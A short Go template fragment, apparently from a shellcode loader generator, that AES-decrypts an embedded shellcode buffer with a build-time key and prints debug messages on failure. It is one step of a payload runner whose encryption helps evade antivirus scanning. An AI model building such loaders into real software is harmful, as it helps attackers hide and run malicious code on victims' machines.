{{if .Debug}}
printDebug("info","Decrypt AES payload data")
{{end}}
shellcode, errAes := decryptAES(shellcode, "{{.Key}}")

if errAes != nil {
	{{if .Debug}}
	printDebug("error","AES decrypt function error: %s", errAes)
	{{end}}
	return
}